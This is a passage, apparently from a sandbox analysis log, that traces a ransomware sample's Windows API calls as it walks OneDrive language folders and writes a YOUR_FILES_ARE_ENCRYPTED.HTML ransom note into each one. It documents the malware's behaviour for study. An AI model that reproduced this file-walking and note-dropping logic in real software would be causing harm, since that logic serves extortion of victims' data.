lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ka" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ka") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ka" [0161.824] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ka", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ka\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ka\\*" [0161.824] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ka\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa44aa4d0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa4673550, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa4673550, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0161.825] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa44aa4d0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa4673550, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa4673550, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.825] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa4673550, ftCreationTime.dwHighDateTime=0x1d709b9, 
ftLastAccessTime.dwLowDateTime=0xa4673550, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa4673550, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x134b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0161.825] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ka\\FileSync.LocalizedResources.dll.mui") returned 110 [0161.825] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0161.825] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.825] lstrlenW (lpString=".mui") returned 4 [0161.825] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.825] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa4673550, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa4673550, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa4673550, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x134b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0161.825] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0161.825] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ka\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0161.826] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ka\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: 
"c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\ka\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0161.826] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0161.828] CloseHandle (hObject=0x5b8) returned 1 [0161.829] GetProcessHeap () returned 0x270000 [0161.830] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0161.830] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa4673550, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa49b9390, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa49b9390, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="kk", cAlternateFileName="")) returned 1 [0161.830] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\kk") returned 74 [0161.830] GetProcessHeap () returned 0x270000 [0161.830] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0161.830] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\kk" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\kk") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\kk" [0161.830] lstrcatW (in: 
lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\kk", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\kk\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\kk\\*" [0161.830] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\kk\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa4673550, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa49b9390, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa49b9390, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0161.831] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa4673550, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa49b9390, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa49b9390, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.831] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa49b9390, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa49b9390, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa49b9390, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12cb0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0161.831] 
wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\kk\\FileSync.LocalizedResources.dll.mui") returned 110 [0161.831] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0161.831] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.831] lstrlenW (lpString=".mui") returned 4 [0161.831] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.831] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa49b9390, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa49b9390, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa49b9390, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12cb0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0161.831] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0161.831] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\kk\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0161.831] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\kk\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\kk\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0161.832] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, 
lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0161.834] CloseHandle (hObject=0x5b8) returned 1 [0161.835] GetProcessHeap () returned 0x270000 [0161.836] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0161.836] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa49b9390, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa4ba8570, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa4ba8570, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="km-kh", cAlternateFileName="")) returned 1 [0161.836] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\km-kh") returned 77 [0161.836] GetProcessHeap () returned 0x270000 [0161.836] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0161.836] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\km-kh" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\km-kh") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\km-kh" [0161.836] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\km-kh", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\km-kh\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\km-kh\\*" [0161.836] FindFirstFileW (in: 
lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\km-kh\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa49b9390, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa4ba8570, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa4ba8570, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0161.837] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa49b9390, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa4ba8570, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa4ba8570, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.837] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa4ba8570, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa4ba8570, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa4ba8570, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12ca8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0161.837] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\km-kh\\FileSync.LocalizedResources.dll.mui") returned 113 [0161.837] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 
[0161.837] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.837] lstrlenW (lpString=".mui") returned 4 [0161.837] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.837] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa4ba8570, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa4ba8570, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa4ba8570, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12ca8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0161.838] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0161.838] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\km-kh\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 107 [0161.838] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\km-kh\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\km-kh\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0161.838] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0161.841] CloseHandle (hObject=0x5b8) returned 1 [0161.841] GetProcessHeap () returned 0x270000 [0161.842] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 
[0161.842] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa4ba8570, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa4e09b70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa4e09b70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="kn", cAlternateFileName="")) returned 1 [0161.842] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\kn") returned 74 [0161.842] GetProcessHeap () returned 0x270000 [0161.842] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0161.842] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\kn" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\kn") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\kn" [0161.842] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\kn", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\kn\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\kn\\*" [0161.842] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\kn\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa4ba8570, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa4e09b70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa4e09b70, 
ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0161.843] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa4ba8570, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa4e09b70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa4e09b70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.843] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa4e09b70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa4e09b70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa4e09b70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x13ab0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0161.843] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\kn\\FileSync.LocalizedResources.dll.mui") returned 110 [0161.843] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0161.843] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.843] lstrlenW (lpString=".mui") returned 4 [0161.843] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.843] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, 
ftCreationTime.dwLowDateTime=0xa4e09b70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa4e09b70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa4e09b70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x13ab0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0161.843] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0161.843] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\kn\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0161.843] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\kn\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\kn\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0161.844] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0161.846] CloseHandle (hObject=0x5b8) returned 1 [0161.847] GetProcessHeap () returned 0x270000 [0161.847] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0161.847] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa4e09b70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa4f86930, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa4f86930, 
ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="ko", cAlternateFileName="")) returned 1 [0161.847] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ko") returned 74 [0161.847] GetProcessHeap () returned 0x270000 [0161.847] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0161.847] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ko" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ko") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ko" [0161.847] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ko", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ko\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ko\\*" [0161.848] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ko\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa4e09b70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa4f86930, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa4f86930, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0161.849] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa4e09b70, 
